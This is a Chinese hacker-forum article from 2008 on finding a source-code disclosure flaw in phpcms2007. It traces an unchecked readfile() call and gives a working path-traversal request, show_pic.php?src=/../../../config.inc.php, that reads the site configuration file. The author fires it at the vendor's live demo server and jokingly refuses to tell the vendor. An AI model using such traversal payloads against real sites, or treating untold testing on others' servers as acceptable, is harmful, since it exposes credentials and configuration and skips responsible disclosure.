一次简单的php源代码泄露漏洞发掘 - 华夏黑客同盟

| 网站首页 | 资讯 | Hack | 漏洞 | 网管 | 编程 | 培训 | 品黑页 | 软件 | 论坛 | 动画 | 视频 | 经典 | 教学站 | 黑客点睛 |

服务导航

我要发布

主力频道

精华收集

光盘刻录

您现在的位置：华夏黑客同盟 >> Hack >> 黑客入侵 >> 正文

用户登录

新用户注册

一次简单的php源代码泄露漏洞发掘

热 ★★★

【字体：小大】

一次简单的php源代码泄露漏洞发掘

作者：未知文章来源：网络点击数：更新时间：2008-4-13

我们知道在asp中出现得最多的还是sql注入，不过在php中由于magic_quotes_gpc为on的情况下特殊字符会被转义，所以即使有很多时候存在sql注入也无法利用。但是php强大的文件操作功能却使我们能体会到在asp中无法体会的乐趣，我想php自带的文件操作函数能让你为之心跳加快~~嘿嘿

这次我发掘的是phpcms2007的源代码泄露漏洞

再次向Phpcms2007的开源行为致敬！！

开始吧，

findstr /s /n /i readfile *.php >readfile.txt (结果我只给出有用的)

其他的文件操作函数可以自己定义查找

module\picture\show_pic.inc.php:8:readfile($file);

跟进这个文件看看吧，呵呵，比较小，我喜欢

[Copy to clipboard] [ - ]CODE:
<?php
defined('IN_PHPCMS') or exit('Access Denied');
require PHPCMS_ROOT.'/module/'.$mod.'/include/common.inc.php';
isset($src) or exit;
$file = PHPCMS_ROOT.'/'.$PHPCMS['uploaddir'].'/'.$CHA['channeldir'].'/'.$MOD['upload_dir'].'/'.$src;
if(empty($PHP_REFERER) || !strpos($PHP_REFERER, $PHP_DOMAIN)) $file = PHPCMS_ROOT.'/images/error.jpg';
header("Content-type:image/pjpeg");
readfile($file);
?>
一路分析下。。。

先包含文件/module/'.$mod.'/include/common.inc.php

如果存在变量$src则赋予它路径并把值交给变量$file

然后就是就进入if

这里我不看其他的文件简单猜测下应该是判断url路径来源，也就是防盗链的功能

然后就header()一个图片头

呵呵，轻轻松松就readfile($file);

可以看出它没有判断$src的文件类型，如果我们提交一个src=*.php也会被readfile

好吧，在这里漏洞是出现了

不过由于“defined('IN_PHPCMS') or exit('Access Denied');”，所以我们是无法直接利用这个漏洞文件的

只能是在其他包含这个文件的php文件中利用

继续吧

[Copy to clipboard] [ - ]CODE:
findstr /s /i /n show_pic.inc.php *.php >show_pic.inc.php.txt

picture\show_pic.php:4:require PHPCMS_ROOT."/module/".$mod."/show_pic.inc.php";
进去看看

[Copy to clipboard] [ - ]CODE:
<?php
require "./config.inc.php";
require "../include/common.inc.php";
require PHPCMS_ROOT."/module/".$mod."/show_pic.inc.php";
?>
呵呵，要是register_globals为on的话就可以直接利用这个文件读取目标文件了

那就测试吧

官方是演示站是

[Copy to clipboard] [ - ]CODE:
http://demo.phpcms.cn/
那就这样构造url

[Copy to clipboard] [ - ]CODE:
/picture/show_pic.php?src=/../../../config.inc.php
嘿嘿，读取的就是网站的配置文件

直接访问

[Copy to clipboard] [ - ]CODE:
http://demo.phpcms.cn//picture/show_pic.php?src=/../../../config.inc.php
呵呵，猜测没错！！

那我们可以先访问http://demo.phpcms.cn/抓包

用nc发包

get选项就设置为

[Copy to clipboard] [ - ]CODE:
/picture/show_pic.php?src=/../../../config.inc.php
这里我就用刺猬的一个post提交工具代替了

测试结果如图

ok，就分析到这里了

希望大家不要利用这个做违法的事，嘿嘿！！

偶是坏孩子，不通知官方了~·好孩子去通知下。

责任编辑：章新艳　　联系方式　Email：章新艳

电话：51228163

上一篇黑客：快速135端口入侵电脑

下一篇黑客：防范假网站工行专家为您支招

【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

（只显示最新5条。评论内容只代表网友观点，与本站立场无关！）

姓名：	* 游客填写　·注册用户
主页：
评分：	1分 2分 3分 4分 5分
评论内容：
验证码： *

请遵守《互联网电子公告服务管理规定》及中华人民共和国其他各项有关法律法规。严禁发表危害国家安全、损害国家利益、破坏民族团结、破坏国家宗教政策、破坏社会稳定、侮辱、诽谤、教唆、淫秽等内容的评论。用户需对自己在使用本站服务过程中的行为承担法律责任（直接或间接导致的）。本站管理员有权保留或删除评论内容。评论内容只代表网友个人观点，与本网站立场无关。

最新hack更新

最新推荐资讯

最新会员软件

最新推荐视频

最新推荐动画

mailto:webmaster@77169.net
咨询QQ号:836982 / 59280880
联系站长 QQ38588913